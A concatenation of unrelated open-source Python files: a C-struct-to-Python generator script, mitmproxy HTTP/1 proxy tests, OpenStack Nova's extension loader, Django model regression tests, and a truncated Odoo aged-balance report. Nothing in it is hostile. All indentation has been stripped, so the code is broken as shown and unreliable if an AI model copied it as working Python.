fpy = open('sgit_struct.py', 'w')
fpy.write('# encoding: UTF-8\n')
fpy.write('\n')
fpy.write('structDict = {}\n')
fpy.write('\n')
for no, line in enumerate(fcpp):
# 结构体申明注释
if '///' in line and '\t' not in line:
py_line = '#' + line[3:]
# 结构体变量注释
elif '\t///' in line:
py_line = '#' + line[4:]
# 结构体申明
elif 'struct' in line:
content = line.split(' ')
name = content[-1].replace('\n','')
py_line = '%s = {}\n' % name
# 结构体变量
elif ' ' in line and '///' not in line and '{' not in line:
#content = line.split('\t')
if ' ;' in line:
line = line.replace(' ;', ';')
if ' ' in line:
line = re.sub(' +', '\t', line)
if '\t\t' in line:
line = re.sub('\t+', '\t', line)
if '//' in line:
n = line.index('//')
line = line[:n]
print no, ':', line
content = line.split('\t')
print content
typedef = content[1]
type_ = typedefDict[typedef]
variable = content[2].replace(';\n', "")
if ';' in variable:
variable = variable.replace(';', '')
py_line = '%s["%s"] = "%s"\n' % (name, variable, type_)
# 结构体结束
elif '}' in line:
py_line = "structDict['%s'] = %s\n\n" % (name, name)
# 结构体开始
elif '{' in line:
py_line = ''
# 其他
else:
py_line = '\n'
fpy.write(py_line.decode('gbk').encode('utf-8'))
if __name__ == '__main__':
main()
|
mit
|
MatthewShao/mitmproxy
|
test/mitmproxy/proxy/protocol/test_http1.py
|
6
|
3325
|
from unittest import mock
import pytest
from mitmproxy.test import tflow
from mitmproxy.net.http import http1
from mitmproxy.net.tcp import TCPClient
from mitmproxy.test.tutils import treq
from ... import tservers
class TestHTTPFlow:
def test_repr(self):
f = tflow.tflow(resp=True, err=True)
assert repr(f)
class TestInvalidRequests(tservers.HTTPProxyTest):
ssl = True
def test_double_connect(self):
p = self.pathoc()
with p.connect():
r = p.request("connect:'%s:%s'" % ("127.0.0.1", self.server2.port))
assert r.status_code == 400
assert b"Unexpected CONNECT" in r.content
def test_relative_request(self):
p = self.pathoc_raw()
with p.connect():
r = p.request("get:/p/200")
assert r.status_code == 400
assert b"Invalid HTTP request form" in r.content
class TestProxyMisconfiguration(tservers.TransparentProxyTest):
def test_absolute_request(self):
p = self.pathoc()
with p.connect():
r = p.request("get:'http://localhost:%d/p/200'" % self.server.port)
assert r.status_code == 400
assert b"misconfiguration" in r.content
class TestExpectHeader(tservers.HTTPProxyTest):
def test_simple(self):
client = TCPClient(("127.0.0.1", self.proxy.port))
client.connect()
# call pathod server, wait a second to complete the request
client.wfile.write(
b"POST http://localhost:%d/p/200 HTTP/1.1\r\n"
b"Expect: 100-continue\r\n"
b"Content-Length: 16\r\n"
b"\r\n" % self.server.port
)
client.wfile.flush()
assert client.rfile.readline() == b"HTTP/1.1 100 Continue\r\n"
assert client.rfile.readline() == b"\r\n"
client.wfile.write(b"0123456789abcdef\r\n")
client.wfile.flush()
resp = http1.read_response(client.rfile, treq())
assert resp.status_code == 200
client.finish()
client.close()
class TestHeadContentLength(tservers.HTTPProxyTest):
def test_head_content_length(self):
p = self.pathoc()
with p.connect():
resp = p.request(
"""head:'%s/p/200:h"Content-Length"="42"'""" % self.server.urlbase
)
assert resp.headers["Content-Length"] == "42"
class TestStreaming(tservers.HTTPProxyTest):
@pytest.mark.parametrize('streaming', [True, False])
def test_streaming(self, streaming):
class Stream:
def requestheaders(self, f):
f.request.stream = streaming
def responseheaders(self, f):
f.response.stream = streaming
def assert_write(self, v):
if streaming:
assert len(v) <= 4096
return self.o.write(v)
self.master.addons.add(Stream())
p = self.pathoc()
with p.connect():
with mock.patch("mitmproxy.net.tcp.Writer.write", side_effect=assert_write, autospec=True):
# response with 10000 bytes
r = p.request("post:'%s/p/200:b@10000'" % self.server.urlbase)
assert len(r.content) == 10000
# request with 10000 bytes
assert p.request("post:'%s/p/200':b@10000" % self.server.urlbase)
|
mit
|
gspilio/nova
|
nova/api/openstack/extensions.py
|
7
|
13312
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import webob.dec
import webob.exc
import nova.api.openstack
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
import nova.policy
LOG = logging.getLogger(__name__)
class ExtensionDescriptor(object):
"""Base class that defines the contract for extensions.
Note that you don't have to derive from this class to have a valid
extension; it is purely a convenience.
"""
# The name of the extension, e.g., 'Fox In Socks'
name = None
# The alias for the extension, e.g., 'FOXNSOX'
alias = None
# Description comes from the docstring for the class
# The XML namespace for the extension, e.g.,
# 'http://www.fox.in.socks/api/ext/pie/v1.0'
namespace = None
# The timestamp when the extension was last updated, e.g.,
# '2011-01-22T13:25:27-06:00'
updated = None
def __init__(self, ext_mgr):
"""Register extension with the extension manager."""
ext_mgr.register(self)
self.ext_mgr = ext_mgr
def get_resources(self):
"""List of extensions.ResourceExtension extension objects.
Resources define new nouns, and are accessible through URLs.
"""
resources = []
return resources
def get_controller_extensions(self):
"""List of extensions.ControllerExtension extension objects.
Controller extensions are used to extend existing controllers.
"""
controller_exts = []
return controller_exts
@classmethod
def nsmap(cls):
"""Synthesize a namespace map from extension."""
# Start with a base nsmap
nsmap = ext_nsmap.copy()
# Add the namespace for the extension
nsmap[cls.alias] = cls.namespace
return nsmap
@classmethod
def xmlname(cls, name):
"""Synthesize element and attribute names."""
return '{%s}%s' % (cls.namespace, name)
def make_ext(elem):
elem.set('name')
elem.set('namespace')
elem.set('alias')
elem.set('updated')
desc = xmlutil.SubTemplateElement(elem, 'description')
desc.text = 'description'
xmlutil.make_links(elem, 'links')
ext_nsmap = {None: xmlutil.XMLNS_COMMON_V10, 'atom': xmlutil.XMLNS_ATOM}
class ExtensionTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('extension', selector='extension')
make_ext(root)
return xmlutil.MasterTemplate(root, 1, nsmap=ext_nsmap)
class ExtensionsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('extensions')
elem = xmlutil.SubTemplateElement(root, 'extension',
selector='extensions')
make_ext(elem)
return xmlutil.MasterTemplate(root, 1, nsmap=ext_nsmap)
class ExtensionsResource(wsgi.Resource):
def __init__(self, extension_manager):
self.extension_manager = extension_manager
super(ExtensionsResource, self).__init__(None)
def _translate(self, ext):
ext_data = {}
ext_data['name'] = ext.name
ext_data['alias'] = ext.alias
ext_data['description'] = ext.__doc__
ext_data['namespace'] = ext.namespace
ext_data['updated'] = ext.updated
ext_data['links'] = [] # TODO(dprince): implement extension links
return ext_data
@wsgi.serializers(xml=ExtensionsTemplate)
def index(self, req):
extensions = []
for ext in self.extension_manager.sorted_extensions():
extensions.append(self._translate(ext))
return dict(extensions=extensions)
@wsgi.serializers(xml=ExtensionTemplate)
def show(self, req, id):
try:
# NOTE(dprince): the extensions alias is used as the 'id' for show
ext = self.extension_manager.extensions[id]
except KeyError:
raise webob.exc.HTTPNotFound()
return dict(extension=self._translate(ext))
def delete(self, req, id):
raise webob.exc.HTTPNotFound()
def create(self, req):
raise webob.exc.HTTPNotFound()
class ExtensionManager(object):
"""Load extensions from the configured extension path.
See nova/tests/api/openstack/volume/extensions/foxinsocks.py or an
example extension implementation.
"""
def sorted_extensions(self):
if self.sorted_ext_list is None:
self.sorted_ext_list = sorted(self.extensions.iteritems())
for _alias, ext in self.sorted_ext_list:
yield ext
def is_loaded(self, alias):
return alias in self.extensions
def register(self, ext):
# Do nothing if the extension doesn't check out
if not self._check_extension(ext):
return
alias = ext.alias
LOG.audit(_('Loaded extension: %s'), alias)
if alias in self.extensions:
raise exception.NovaException("Found duplicate extension: %s"
% alias)
self.extensions[alias] = ext
self.sorted_ext_list = None
def get_resources(self):
"""Returns a list of ResourceExtension objects."""
resources = []
resources.append(ResourceExtension('extensions',
ExtensionsResource(self)))
for ext in self.sorted_extensions():
try:
resources.extend(ext.get_resources())
except AttributeError:
# NOTE(dprince): Extension aren't required to have resource
# extensions
pass
return resources
def get_controller_extensions(self):
"""Returns a list of ControllerExtension objects."""
controller_exts = []
for ext in self.sorted_extensions():
try:
get_ext_method = ext.get_controller_extensions
except AttributeError:
# NOTE(Vek): Extensions aren't required to have
# controller extensions
continue
controller_exts.extend(get_ext_method())
return controller_exts
def _check_extension(self, extension):
"""Checks for required methods in extension objects."""
try:
LOG.debug(_('Ext name: %s'), extension.name)
LOG.debug(_('Ext alias: %s'), extension.alias)
LOG.debug(_('Ext description: %s'),
' '.join(extension.__doc__.strip().split()))
LOG.debug(_('Ext namespace: %s'), extension.namespace)
LOG.debug(_('Ext updated: %s'), extension.updated)
except AttributeError as ex:
LOG.exception(_("Exception loading extension: %s"), unicode(ex))
return False
return True
def load_extension(self, ext_factory):
"""Execute an extension factory.
Loads an extension. The 'ext_factory' is the name of a
callable that will be imported and called with one
argument--the extension manager. The factory callable is
expected to call the register() method at least once.
"""
LOG.debug(_("Loading extension %s"), ext_factory)
if isinstance(ext_factory, basestring):
# Load the factory
factory = importutils.import_class(ext_factory)
else:
factory = ext_factory
# Call it
LOG.debug(_("Calling extension factory %s"), ext_factory)
factory(self)
def _load_extensions(self):
"""Load extensions specified on the command line."""
extensions = list(self.cls_list)
for ext_factory in extensions:
try:
self.load_extension(ext_factory)
except Exception as exc:
LOG.warn(_('Failed to load extension %(ext_factory)s: '
'%(exc)s') % locals())
class ControllerExtension(object):
"""Extend core controllers of nova OpenStack API.
Provide a way to extend existing nova OpenStack API core
controllers.
"""
def __init__(self, extension, collection, controller):
self.extension = extension
self.collection = collection
self.controller = controller
class ResourceExtension(object):
"""Add top level resources to the OpenStack API in nova."""
def __init__(self, collection, controller=None, parent=None,
collection_actions=None, member_actions=None,
custom_routes_fn=None, inherits=None):
if not collection_actions:
collection_actions = {}
if not member_actions:
member_actions = {}
self.collection = collection
self.controller = controller
self.parent = parent
self.collection_actions = collection_actions
self.member_actions = member_actions
self.custom_routes_fn = custom_routes_fn
self.inherits = inherits
def wrap_errors(fn):
"""Ensure errors are not passed along."""
def wrapped(*args, **kwargs):
try:
return fn(*args, **kwargs)
except webob.exc.HTTPException:
raise
except Exception:
raise webob.exc.HTTPInternalServerError()
return wrapped
def load_standard_extensions(ext_mgr, logger, path, package, ext_list=None):
"""Registers all standard API extensions."""
# Walk through all the modules in our directory...
our_dir = path[0]
for dirpath, dirnames, filenames in os.walk(our_dir):
# Compute the relative package name from the dirpath
relpath = os.path.relpath(dirpath, our_dir)
if relpath == '.':
relpkg = ''
else:
relpkg = '.%s' % '.'.join(relpath.split(os.sep))
# Now, consider each file in turn, only considering .py files
for fname in filenames:
root, ext = os.path.splitext(fname)
# Skip __init__ and anything that's not .py
if ext != '.py' or root == '__init__':
continue
# Try loading it
classname = "%s%s" % (root[0].upper(), root[1:])
classpath = ("%s%s.%s.%s" %
(package, relpkg, root, classname))
if ext_list is not None and classname not in ext_list:
logger.debug("Skipping extension: %s" % classpath)
continue
try:
ext_mgr.load_extension(classpath)
except Exception as exc:
logger.warn(_('Failed to load extension %(classpath)s: '
'%(exc)s') % locals())
# Now, let's consider any subdirectories we may have...
subdirs = []
for dname in dirnames:
# Skip it if it does not have __init__.py
if not os.path.exists(os.path.join(dirpath, dname,
'__init__.py')):
continue
# If it has extension(), delegate...
ext_name = ("%s%s.%s.extension" %
(package, relpkg, dname))
try:
ext = importutils.import_class(ext_name)
except ImportError:
# extension() doesn't exist on it, so we'll explore
# the directory for ourselves
subdirs.append(dname)
else:
try:
ext(ext_mgr)
except Exception as exc:
logger.warn(_('Failed to load extension %(ext_name)s: '
'%(exc)s') % locals())
# Update the list of directories we'll explore...
dirnames[:] = subdirs
def extension_authorizer(api_name, extension_name):
def authorize(context, target=None, action=None):
if target is None:
target = {'project_id': context.project_id,
'user_id': context.user_id}
if action is None:
act = '%s_extension:%s' % (api_name, extension_name)
else:
act = '%s_extension:%s:%s' % (api_name, extension_name, action)
nova.policy.enforce(context, act, target)
return authorize
def soft_extension_authorizer(api_name, extension_name):
hard_authorize = extension_authorizer(api_name, extension_name)
def authorize(context):
try:
hard_authorize(context)
return True
except exception.NotAuthorized:
return False
return authorize
|
apache-2.0
|
bikong2/django
|
tests/model_regress/tests.py
|
326
|
8962
|
from __future__ import unicode_literals
import datetime
from operator import attrgetter
from django.core.exceptions import ValidationError
from django.db import router
from django.db.models.sql import InsertQuery
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from django.utils.timezone import get_fixed_timezone
from .models import (
Article, BrokenUnicodeMethod, Department, Event, Model1, Model2, Model3,
NonAutoPK, Party, Worker,
)
class ModelTests(TestCase):
# The bug is that the following queries would raise:
# "TypeError: Related Field has invalid lookup: gte"
def test_related_gte_lookup(self):
"""
Regression test for #10153: foreign key __gte lookups.
"""
Worker.objects.filter(department__gte=0)
def test_related_lte_lookup(self):
"""
Regression test for #10153: foreign key __lte lookups.
"""
Worker.objects.filter(department__lte=0)
def test_sql_insert_compiler_return_id_attribute(self):
"""
Regression test for #14019: SQLInsertCompiler.as_sql() failure
"""
db = router.db_for_write(Party)
query = InsertQuery(Party)
query.insert_values([Party._meta.fields[0]], [], raw=False)
# this line will raise an AttributeError without the accompanying fix
query.get_compiler(using=db).as_sql()
def test_empty_choice(self):
# NOTE: Part of the regression test here is merely parsing the model
# declaration. The verbose_name, in particular, did not always work.
a = Article.objects.create(
headline="Look at me!", pub_date=datetime.datetime.now()
)
# An empty choice field should return None for the display name.
self.assertIs(a.get_status_display(), None)
# Empty strings should be returned as Unicode
a = Article.objects.get(pk=a.pk)
self.assertEqual(a.misc_data, '')
self.assertIs(type(a.misc_data), six.text_type)
def test_long_textfield(self):
# TextFields can hold more than 4000 characters (this was broken in
# Oracle).
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text="ABCDE" * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 5000)
def test_long_unicode_textfield(self):
# TextFields can hold more than 4000 bytes also when they are
# less than 4000 characters
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text='\u05d0\u05d1\u05d2' * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 3000)
def test_date_lookup(self):
# Regression test for #659
Party.objects.create(when=datetime.datetime(1999, 12, 31))
Party.objects.create(when=datetime.datetime(1998, 12, 31))
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create(when=datetime.datetime(1, 3, 3))
self.assertQuerysetEqual(
Party.objects.filter(when__month=2), []
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=1), [
datetime.date(1999, 1, 1)
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=12), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year=1998), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #8510
self.assertQuerysetEqual(
Party.objects.filter(when__day="31"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__month="12"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year="1998"), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #18969
self.assertQuerysetEqual(
Party.objects.filter(when__year=1), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__year='1'), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
def test_date_filter_null(self):
# Date filtering was failing with NULL date values in SQLite
# (regression test for #3501, among other things).
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create()
p = Party.objects.filter(when__month=1)[0]
self.assertEqual(p.when, datetime.date(1999, 1, 1))
self.assertQuerysetEqual(
Party.objects.filter(pk=p.pk).dates("when", "month"), [
1
],
attrgetter("month")
)
def test_get_next_prev_by_field(self):
# Check that get_next_by_FIELD and get_previous_by_FIELD don't crash
# when we have usecs values stored on the database
#
# It crashed after the Field.get_db_prep_* refactor, because on most
# backends DateTimeFields supports usecs, but DateTimeField.to_python
# didn't recognize them. (Note that
# Model._get_next_or_previous_by_FIELD coerces values to strings)
Event.objects.create(when=datetime.datetime(2000, 1, 1, 16, 0, 0))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 6, 1, 1))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 13, 1, 1))
e = Event.objects.create(when=datetime.datetime(2000, 1, 1, 12, 0, 20, 24))
self.assertEqual(
e.get_next_by_when().when, datetime.datetime(2000, 1, 1, 13, 1, 1)
)
self.assertEqual(
e.get_previous_by_when().when, datetime.datetime(2000, 1, 1, 6, 1, 1)
)
def test_primary_key_foreign_key_types(self):
# Check Department and Worker (non-default PK type)
d = Department.objects.create(id=10, name="IT")
w = Worker.objects.create(department=d, name="Full-time")
self.assertEqual(six.text_type(w), "Full-time")
def test_broken_unicode(self):
# Models with broken unicode methods should still have a printable repr
b = BrokenUnicodeMethod.objects.create(name="Jerry")
self.assertEqual(repr(b), "<BrokenUnicodeMethod: [Bad Unicode data]>")
@skipUnlessDBFeature("supports_timezones")
def test_timezones(self):
# Saving an updating with timezone-aware datetime Python objects.
# Regression test for #10443.
# The idea is that all these creations and saving should work without
# crashing. It's not rocket science.
dt1 = datetime.datetime(2008, 8, 31, 16, 20, tzinfo=get_fixed_timezone(600))
dt2 = datetime.datetime(2008, 8, 31, 17, 20, tzinfo=get_fixed_timezone(600))
obj = Article.objects.create(
headline="A headline", pub_date=dt1, article_text="foo"
)
obj.pub_date = dt2
obj.save()
self.assertEqual(
Article.objects.filter(headline="A headline").update(pub_date=dt1),
1
)
def test_chained_fks(self):
"""
Regression for #18432: Chained foreign keys with to_field produce incorrect query
"""
m1 = Model1.objects.create(pkey=1000)
m2 = Model2.objects.create(model1=m1)
m3 = Model3.objects.create(model2=m2)
# this is the actual test for #18432
m3 = Model3.objects.get(model2=1000)
m3.model2
class ModelValidationTest(TestCase):
def test_pk_validation(self):
NonAutoPK.objects.create(name="one")
again = NonAutoPK(name="one")
self.assertRaises(ValidationError, again.validate_unique)
class EvaluateMethodTest(TestCase):
"""
Regression test for #13640: cannot filter by objects with 'evaluate' attr
"""
def test_model_with_evaluate_method(self):
"""
Ensures that you can filter by objects that have an 'evaluate' attr
"""
dept = Department.objects.create(pk=1, name='abc')
dept.evaluate = 'abc'
Worker.objects.filter(department=dept)
|
bsd-3-clause
|
windedge/odoo
|
addons/account/report/account_aged_partner_balance.py
|
152
|
21511
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
from common_report_header import common_report_header
class aged_trial_report(report_sxw.rml_parse, common_report_header):
def __init__(self, cr, uid, name, context):
super(aged_trial_report, self).__init__(cr, uid, name, context=context)
self.total_account = []
self.localcontext.update({
'time': time,
'get_lines_with_out_partner': self._get_lines_with_out_partner,
'get_lines': self._get_lines,
'get_total': self._get_total,
'get_direction': self._get_direction,
'get_for_period': self._get_for_period,
'get_company': self._get_company,
'get_currency': self._get_currency,
'get_partners':self._get_partners,
'get_account': self._get_account,
'get_fiscalyear': self._get_fiscalyear,
'get_target_move': self._get_target_move,
})
def set_context(self, objects, data, ids, report_type=None):
obj_move = self.pool.get('account.move.line')
ctx = data['form'].get('used_context', {})
ctx.update({'fiscalyear': False, 'all_fiscalyear': True})
self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx)
self.direction_selection = data['form'].get('direction_selection', 'past')
self.target_move = data['form'].get('target_move', 'all')
self.date_from = data['form'].get('date_from', time.strftime('%Y-%m-%d'))
if (data['form']['result_selection'] == 'customer' ):
self.ACCOUNT_TYPE = ['receivable']
elif (data['form']['result_selection'] == 'supplier'):
self.ACCOUNT_TYPE = ['payable']
else:
self.ACCOUNT_TYPE = ['payable','receivable']
return super(aged_trial_report, self).set_context(objects, data, ids, report_type=report_type)
def _get_lines(self, form):
res = []
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
self.cr.execute('SELECT DISTINCT res_partner.id AS id,\
res_partner.name AS name \
FROM res_partner,account_move_line AS l, account_account, account_move am\
WHERE (l.account_id=account_account.id) \
AND (l.move_id=am.id) \
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND account_account.active\
AND ((reconcile_id IS NULL)\
OR (reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND (l.partner_id=res_partner.id)\
AND (l.date <= %s)\
AND ' + self.query + ' \
ORDER BY res_partner.name', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from,))
partners = self.cr.dictfetchall()
## mise a 0 du total
for i in range(7):
self.total_account.append(0)
#
# Build a string like (1,2,3) for easy use in SQL query
partner_ids = [x['id'] for x in partners]
if not partner_ids:
return []
# This dictionary will store the debit-credit for all partners, using partner_id as key.
totals = {}
self.cr.execute('SELECT l.partner_id, SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id) \
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (l.partner_id IN %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND ' + self.query + '\
AND account_account.active\
AND (l.date <= %s)\
GROUP BY l.partner_id ', (tuple(move_state), tuple(self.ACCOUNT_TYPE), tuple(partner_ids), self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
totals[i[0]] = i[1]
# This dictionary will store the future or past of all partners
future_past = {}
if self.direction_selection == 'future':
self.cr.execute('SELECT l.partner_id, SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id) \
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity, l.date) < %s)\
AND (l.partner_id IN %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active\
AND (l.date <= %s)\
GROUP BY l.partner_id', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, tuple(partner_ids),self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
future_past[i[0]] = i[1]
elif self.direction_selection == 'past': # Using elif so people could extend without this breaking
self.cr.execute('SELECT l.partner_id, SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity,l.date) > %s)\
AND (l.partner_id IN %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active\
AND (l.date <= %s)\
GROUP BY l.partner_id', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, tuple(partner_ids), self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
future_past[i[0]] = i[1]
# Use one query per period and store results in history (a list variable)
# Each history will contain: history[1] = {'<partner_id>': <partner_debit-credit>}
history = []
for i in range(5):
args_list = (tuple(move_state), tuple(self.ACCOUNT_TYPE), tuple(partner_ids),self.date_from,)
dates_query = '(COALESCE(l.date_maturity,l.date)'
if form[str(i)]['start'] and form[str(i)]['stop']:
dates_query += ' BETWEEN %s AND %s)'
args_list += (form[str(i)]['start'], form[str(i)]['stop'])
elif form[str(i)]['start']:
dates_query += ' >= %s)'
args_list += (form[str(i)]['start'],)
else:
dates_query += ' <= %s)'
args_list += (form[str(i)]['stop'],)
args_list += (self.date_from,)
self.cr.execute('''SELECT l.partner_id, SUM(l.debit-l.credit), l.reconcile_partial_id
FROM account_move_line AS l, account_account, account_move am
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id)
AND (am.state IN %s)
AND (account_account.type IN %s)
AND (l.partner_id IN %s)
AND ((l.reconcile_id IS NULL)
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))
AND ''' + self.query + '''
AND account_account.active
AND ''' + dates_query + '''
AND (l.date <= %s)
GROUP BY l.partner_id, l.reconcile_partial_id''', args_list)
partners_partial = self.cr.fetchall()
partners_amount = dict((i[0],0) for i in partners_partial)
for partner_info in partners_partial:
if partner_info[2]:
# in case of partial reconciliation, we want to keep the left amount in the oldest period
self.cr.execute('''SELECT MIN(COALESCE(date_maturity,date)) FROM account_move_line WHERE reconcile_partial_id = %s''', (partner_info[2],))
date = self.cr.fetchall()
partial = False
if 'BETWEEN' in dates_query:
partial = date and args_list[-3] <= date[0][0] <= args_list[-2]
elif '>=' in dates_query:
partial = date and date[0][0] >= form[str(i)]['start']
else:
partial = date and date[0][0] <= form[str(i)]['stop']
if partial:
# partial reconcilation
limit_date = 'COALESCE(l.date_maturity,l.date) %s %%s' % '<=' if self.direction_selection == 'past' else '>='
self.cr.execute('''SELECT SUM(l.debit-l.credit)
FROM account_move_line AS l, account_move AS am
WHERE l.move_id = am.id AND am.state in %s
AND l.reconcile_partial_id = %s
AND ''' + limit_date, (tuple(move_state), partner_info[2], self.date_from))
unreconciled_amount = self.cr.fetchall()
partners_amount[partner_info[0]] += unreconciled_amount[0][0]
else:
partners_amount[partner_info[0]] += partner_info[1]
history.append(partners_amount)
for partner in partners:
values = {}
## If choise selection is in the future
if self.direction_selection == 'future':
# Query here is replaced by one query which gets the all the partners their 'before' value
before = False
if future_past.has_key(partner['id']):
before = [ future_past[partner['id']] ]
self.total_account[6] = self.total_account[6] + (before and before[0] or 0.0)
values['direction'] = before and before[0] or 0.0
elif self.direction_selection == 'past': # Changed this so people could in the future create new direction_selections
# Query here is replaced by one query which gets the all the partners their 'after' value
after = False
if future_past.has_key(partner['id']): # Making sure this partner actually was found by the query
after = [ future_past[partner['id']] ]
self.total_account[6] = self.total_account[6] + (after and after[0] or 0.0)
values['direction'] = after and after[0] or 0.0
for i in range(5):
during = False
if history[i].has_key(partner['id']):
during = [ history[i][partner['id']] ]
# Ajout du compteur
self.total_account[(i)] = self.total_account[(i)] + (during and during[0] or 0)
values[str(i)] = during and during[0] or 0.0
total = False
if totals.has_key( partner['id'] ):
total = [ totals[partner['id']] ]
values['total'] = total and total[0] or 0.0
## Add for total
self.total_account[(i+1)] = self.total_account[(i+1)] + (total and total[0] or 0.0)
values['name'] = partner['name']
res.append(values)
total = 0.0
totals = {}
for r in res:
total += float(r['total'] or 0.0)
for i in range(5)+['direction']:
totals.setdefault(str(i), 0.0)
totals[str(i)] += float(r[str(i)] or 0.0)
return res
def _get_lines_with_out_partner(self, form):
res = []
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
## mise a 0 du total
for i in range(7):
self.total_account.append(0)
totals = {}
self.cr.execute('SELECT SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (l.partner_id IS NULL)\
AND (account_account.type IN %s)\
AND ((l.reconcile_id IS NULL) \
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND ' + self.query + '\
AND (l.date <= %s)\
AND account_account.active ',(tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from,))
t = self.cr.fetchall()
for i in t:
totals['Unknown Partner'] = i[0]
future_past = {}
if self.direction_selection == 'future':
self.cr.execute('SELECT SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am\
WHERE (l.account_id=account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (l.partner_id IS NULL)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity, l.date) < %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active ', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from))
t = self.cr.fetchall()
for i in t:
future_past['Unknown Partner'] = i[0]
elif self.direction_selection == 'past': # Using elif so people could extend without this breaking
self.cr.execute('SELECT SUM(l.debit-l.credit) \
FROM account_move_line AS l, account_account, account_move am \
